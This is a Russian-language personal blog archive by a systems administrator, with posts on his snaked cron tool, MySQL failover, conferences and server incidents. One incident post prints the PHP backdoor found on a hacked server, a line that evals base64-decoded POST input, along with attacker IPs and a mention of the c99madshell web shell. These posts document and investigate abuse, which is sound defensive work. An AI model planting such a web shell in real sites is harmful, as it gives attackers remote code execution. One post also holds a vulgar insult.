Petya Kohts [entries|archive|friends|userinfo]
Petya Kohts

[ userinfo | ljr userinfo ]
[ archive | journal archive ]

Links
[Links:| Fast Slow ljr_fif tango ]

snaked: cron replacement (YAPC Europe 2013) [Aug. 14th, 2013|07:44 am]
[Tags|, ]
[Current Mood | anxious]
[Current Music |Chicane & Sons - One More Time [ASOT 624]]

http://www.youtube.com/watch?v=fUwY3K35yAc

рассказываю про старые дела в Яндексе,
определяюсь с планами на будущее
Link2 comments|Leave a comment

собеседование в bdbd.ru (корпорация РБС) [Jun. 8th, 2013|06:28 pm]
[Tags|]
[Current Mood | sleepy]
[Current Music |Mario Lanza - Be My Love (From The Toast Of New Orleans)]

Разгребая старые бумаги, нашел задачки по Perl:

https://plus.google.com/photos/106795747251958842191/albums/5887118998883354033?authkey=COLe4OSIgZ_lsAE

которые достались мне на собеседовании
в "корпорации РБС" в сентябре 2011 на эту вакансию:
http://hh.ru/vacancy/4853562

Собственно собеседования никакого не было - я приехал,
посадили в комнату, дали листочки, ручку и оставили.
Сказали, напишите ответы. В комнате были компьютеры,
включать которые не разрешили.

Немножко я даже полистал задачи (по листочкам видно,
что попытался на что-то ответить), но потом решил,
что с товарищами нам не по пути и уехал.

Может кому-нибудь пригодится потренироваться.
Link10 comments|Leave a comment

cb6f82f3e4007bdaccf419abafab94c8 [Apr. 5th, 2013|08:51 pm]
[Tags|, ]
[Current Mood |working]
[Current Music |Hybrid Leisureland - Division and composition]

Очередной раз наспамили с одного из моих серверов.

Конструкция практически такая же, как в прошлый раз:
похоже (логов не сохранилось), что под пользовательским аккаунтом
через ftp залили файл следующего содержания в слегка закодированном виде
(оригинал см. по ссылке снизу):

if(isset($_POST["code"]))
{
    eval(base64_decode($_POST["code"]));
}
Далее через этот файл несколько раз послали спама
на пару десятков тысяч адресов.

Обнаружил дырку spamcop.net, который пожаловался провайдеру,
а тот уже переслал нам. Обнаружил конкретный файл путем просмотра
error_log проскирующего nginx за время, когда в очереди исходящих писем
появилось первое задержанное письмо. Нашлась такая строка:

2013/03/01 16:05:14 [error] 3713#0: *19382 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 201.182.92.138, server: www.joomla.dev.DOMAIN.ru, reques
t: "POST /.e523.php HTTP/1.1", upstream: "http://127.0.0.159:80/.e523.php", host: "www.joomla.dev.DOMAIN.ru"

Имя файла показалось подозрительным, дальше все раскрутилось легко.

Обращения к вредоносному файлу делались со следующих ip адресов:
1) 201.182.92.138 (Панама)
2) 31.184.244.18 (Объединенные Арабские Эмираты)

Материалы:
1) .e523.php
2) листинг очереди sendmail
3) примеры писем из очереди: [1], [2], [3], [4], [5]
4) access_log веб-сервера

Единственный текст, похожий на идентификатор системы,
это закомментированный текст cb6f82f3e4007bdaccf419abafab94c8
в начале программы. Что означает, непонятно. Тридцать два
шестнадцатиричных символа.
LinkLeave a comment

while (*s++ = *t++) ; [Sep. 23rd, 2012|03:31 am]
[Tags|]
[Current Mood | sleepy]
[Current Music |Lil Wayne – Lollipop (feat. Static Major)]

Although this may seem cryptic at first sight,
the notational convenience is considerable,
and the idiom should be mastered, because
you will see it frequently
LinkLeave a comment

про яндекс [Feb. 24th, 2011|10:37 pm]
[Tags|, ]

Про Яндекс из первых рук:

http://www.echo.msk.ru/programs/dozor/751913-echo/
http://down-house.ru/blog/watch/35651-kak-sozdavalsya-yandeks.html

По первой ссылке интересно про руку ФСБ,
по второй просто энергичный рассказ.
LinkLeave a comment

perl sleep [Feb. 19th, 2011|12:39 pm]
[Tags|, ]
[Current Music |Noize MC – Бэктон#1]

Обнаружил около 10 серверов
(из более чем 10 тысяч, на которых
работает snaked), на которых
команда perl sleep(1) не возвращается
от 112 до 222 секунд.

OS: FreeBSD 7.2-STABLE
perl: v5.8.9 built for amd64-freebsd-thread-multi

Надо отметить, что остальные тысячи аппаратов
имеют такую же конфигурацию.

Что это он, интересно?
Link2 comments|Leave a comment

multi-master mysql failover [Feb. 6th, 2011|03:48 am]
[Tags|]
[Current Music |Boys Like Girls - Love Drunk]

Собственно выступление, как было показано на FOSDEM:
http://www.youtube.com/watch?v=Qzht1B7p0yQ

Потом по Skype пытался отвечать на вопросы,
было плохо слышно.

Так слушала публика:


Железный чувак справа в первом ряду -- Monty Widenius,
кот. тоже вопрос какой-то задал, никак не вспомню,
какой именно.

С места событий докладывают: "Lots of discussions about your talk"
Link13 comments|Leave a comment

виртуально и эмоционально [Feb. 5th, 2011|12:20 pm]
[Tags|]
[Current Music |Fee – Victorious]

Эмоционально и виртуально на FOSDEM:
http://fosdem.org/2011/schedule/track/mysql_friends_devroom
Link2 comments|Leave a comment

mysql failover in the real world [Oct. 21st, 2010|08:44 pm]
[Tags|]
[Current Music |Chicane - Hiding All The Stars]

Everyone wants some magic mysql failover setup
in which you can just turn off master node and continue
from the same point using another node.

The most popular scenario for such kind of failover
is master-master replication (each master being a slave
of another) with the workload directed to only one master
at a time. Lets name them Real Master, RM (the one
with the workload) and Backup Master, BM (the one without it).

In this article I propose an algorithm which allows
unlimited number of BMs with the ability to failover
RM to any of them no matter how replication
from RM to BMs is set up.

This is in no way a multi-master solution (you will
not be able to do writes to different nodes) but
in some sense it is very much alike the above described
master-master replication scenario.

With the one and important difference: you have
many possible "masters" to switch to when current master fails.

Read more... )
Link1 comment|Leave a comment

snaked [Jul. 13th, 2010|11:47 pm]
[Tags|]
[Current Music |Keiko Matsui - Tribal Boat]

Вот кстати одно из достижений за последний год:
http://search.cpan.org/~kohts/snaked/snaked

Программа, которая является аналогом cron
с несколькими уникальными фичами, выгодно
отличающими её от обычных cron.

Во-первых, для каждой выполняемой задачи
можно задать ограничение по времени,
после которого она останавливается.

Во-вторых, для каждой задачи можно определить
список задач, одновременно с которыми она
не должна выполняться. Это возможно благодаря тому,
что каждая задача имеет свой уникальный идентификатор.

В-третьих, snaked позволяет запускать задачу чаще,
чем раз в минуту, а именно -- раз в секунду.


Можно установить так:
perl -MCPAN -e 'install snaked'


Сейчас имею ~10000 постоянно работающих установок,
к концу года планирую расшириться до ~15000.
LinkLeave a comment

под ddos [Dec. 21st, 2009|12:54 pm]
[Tags|]
[Current Music |Lena Selyanina - Mountain Heights]

Две недели под ddos
Link10 comments|Leave a comment

объектно-ориентированное системное администрирование [Sep. 29th, 2009|05:22 pm]
[Tags|, ]
[Current Music |HIM - Don't close Your Heart]

Система представляет из себя оригинальную разработку
из класса configuration management систем.

В ps-snake конфигурации компьютеров представляются
в виде классов — директорий и файлов в таком виде,
в котором они хранятся на управляемых компьютерах.
Важной отличительной особенностью системы является то,
что между классами разрешено множественное наследование.

Благодаря возможности множественного наследования
система позволяет управлять множеством разнородных компьютеров,
экономя при этом усилия на разработку — при необходимости
любой код (скрипт, настройку) можно использовать в любом классе,
поддерживая всего лишь одну копию на конфигурационном сервере
и наследуя её в остальных классах.

Благодаря оригинальному способу представления конфигураций
система обладает низким порогом вхождения — ей может пользоваться
системный администратор, практически не владеющий
навыками программирования.

Система пропагандирует необходимость применения принципов
объектно-ориентированного системного администрирования
(Object Oriented System Administration).
Link1 comment|Leave a comment

антенна для gsm-модема [Aug. 29th, 2009|12:03 am]
[Tags|]
[Current Music |Felixdroid – Piano Improvisation 1 (Ava)]

Чтобы узнавать о проблемах в датацентре,
когда датацентр теряет проводную связь с миром,
можно использовать, например, сотовых операторов.

То есть, иметь gsm-модем в датацентре,
через который отправлять sms, или даже просто
использовать его как альтернативный канал связи
с датацентром, пусть и не слишком быстрый,
во время экстренных ситуаций.

С gsm-модемом есть технологическая проблема:
внутри датацентра плохо ловится сигнал.

Пытаюсь обойти эту проблему с помощью антенны,
которую вынесут на улицу и повесят на стену
(или поставят на крышу здания).

Антенну заказывал по телефону, не знал, как выглядит,
сегодня привезли, от неожиданности сфотографировал:

Read more... )

Будем пробовать.
Link2 comments|Leave a comment

Schooner Information Techonology [Jun. 25th, 2009|10:03 pm]
[Tags|]
[Current Music |Ennio Morricone - Deborah's theme]

По ссылке от Peter Zaitsev
слушал вебинар (семинар через интернет)
про использование SSD.

Основная идея выступления Peter Zaitsev была в том,
что SSD это как обычный жесткий диск,
только в 50 и больше раз быстрее
(задержка перед началом чтения/записи
из/в случайное место диска).

Современные же приложения, оптимизированные
под уменьшение количества случайных чтений/записей,
работают не слишком эффективно на таких устройствах.

После выступления Peter Zaitsev выступал представитель
фирмы Schooner Information Techonology,
который рассказал в общих чертах про два аппарата,
разработанные фирмой. Под названием MySQL appliance
и Memcached appliance (собирает аппараты IBM).

В двух словах аппараты представляют из себя
сервера на процессорах Intel Nehalem,
в которые воткнуто по 64G обычной памяти (DRAM)
и 512G SSD, в которых установлены и настроены
соответственно mysql-сервер и memcached.

Кроме того рассказали про наличие своей
фирменной оптимизации, которая позволяет
из одного такого аппарата выжать мощность
6-8 обычных средних аппаратов.

Стоимость (capex) одного mysql-аппарата
приблизительно равна стоимости
пяти обычных аппаратов, стоимость
memcached-аппарата -- десяти обычных.

В Европе появление аппаратов планируется
на третий-четвертый квартал 2009 года
(если правильно расслышал, звук пропадал).
Link12 comments|Leave a comment

план работы [Jun. 16th, 2009|01:30 am]
[Tags|]
[Current Music |Phil Collins - True Colors]

Подал менеджменту план работы группы,
должен был рассказывать, но пока не сложилось.

Розанов раскритиковал первый кадр,
с терминатором, как обычно поздно.

Но вообще на всех друзьях
успел потренироваться рассказывать,
если бы не они -- ничего бы не получилось.

Спасибочки, дорогие!
Link1 comment|Leave a comment

yapc::russia 2009 "May Perl — 2", доклады [May. 16th, 2009|11:55 pm]
[Tags|]
[Current Music |Samuel Barber - Symphony no 1, op.9]

Первым выступал организатор события
Read more... )

После этого начался обед,
а я улизнул и крайне рад (см. дальше)
Link7 comments|Leave a comment

yapc::russia 2009 "May Perl — 2" [May. 16th, 2009|10:48 am]
[Tags|]

* начало задерживают уже на 20 минут,
ходят туда-сюда, мучают проектор

* wifi только для белых людей
("тонкий канал", пароль не дают)

* человек десять из яндекса,
всего человек сто


venue спонсор (что это?) мероприятия --
нечто "бизнес в стиле ру"
Link5 comments|Leave a comment

Become her brutal banger [Apr. 24th, 2009|12:52 am]
[Tags|]
[Current Music |Михей и Джуманджи - Дорога к морю]

Сегодня еще поспамил немного.

Схема та же: закачка файлов по ftp
(cgi-bin/stealth/dark.cgi),
контроль за работой пациента через http.

* log http сервера
* вредоносный скрипт
* база e-mailов
* темы спамных писем
* тело спама 1
* тело спама 2
* список from адресов

Поиск по атаковавшему ip-адресу в google выдает
список заломанных с него серверов (по статистике webalizer).

Если смотреть статистику (через cache google),
то в разделе "по каким строкам находили сайт"
находятся такие слова:
c99madshell
c99madshell v. 2.0 madnet edition
c99madshell.php
c99madshell v 6.0

Видимо, madnet и этот stealth (он же dark.cgi)
в одинаковой степени приходуют клиентов.

Сама машинка 91.212.65.6
находится в Евпатории, Eurohost LLC.
Link5 comments|Leave a comment

вазелин под названием "свобода" [Apr. 23rd, 2009|12:23 am]
[Tags|]
[Current Mood | sick]
[Current Music |Арсен Петросов - Кайфуем]

А ведь противостояние linux и microsoft
это просто новый этап отношений
технарей и гуманитариев.

Скорее, конечно, не гуманитариев,
потому что их операционная система --
это жизнь, а экономистов, которых
часто рассматривают как нечто среднее
между гуманитариями и технарями.

Кто такой технарь? Чаще всего
это узколобый специалист,
интеллектуальный молоток,
которым заколачивают
интеллектуальные гвозди.

Поэтому получается смешно до слез,
когда эти однобокие, закомплексованные люди
начинают изобретать свои "философии".

Обычно получается на уровне
детского сада, то есть,
тотально нежизнеспособно,
ну и, разумеется, копия
известной истории под названием
"повелитель мух"

Впрочем первый эшелон linux
это уже давно не узколобые технари,
а такие же дельцы, как и microsoft.


Поэтому как только вижу дебила,
доказывающего превосходство
одного над другим, то сразу понимаю --
этот любит, когда его ебут в жопу
с вазелином под названием "свобода"
Link24 comments|Leave a comment

never ending story [Apr. 6th, 2009|02:00 am]
[Tags|]
[Current Mood | sleepy]
[Current Music |M83 - We Own The Sky]

PhotoRec 6.10, Data Recovery Utility, July 2008
Christophe GRENIER <grenier@cgsecurity.org>
http://www.cgsecurity.org

Disk /dev/sdb - 160 GB / 149 GiB (RO) - ATA ST3160021A
     Partition                  Start        End    Size in sectors
 1 P Linux                    0   1  1 19456 254 63  312576642


444148 files saved in /usr/local/src/photorec1/recup_dir directory.
Recovery completed.
txt: 346249 recovered
jpg: 34243 recovered
gif: 24888 recovered
doc: 8387 recovered
png: 5819 recovered
gz: 5331 recovered
exe: 5220 recovered
tx?: 2742 recovered
zip: 2496 recovered
elf: 2423 recovered
others: 6350 recovered
[ Quit ]


Took about 8 hours.
LinkLeave a comment

navigation
[ viewing | most recent entries ]
[ go | earlier ]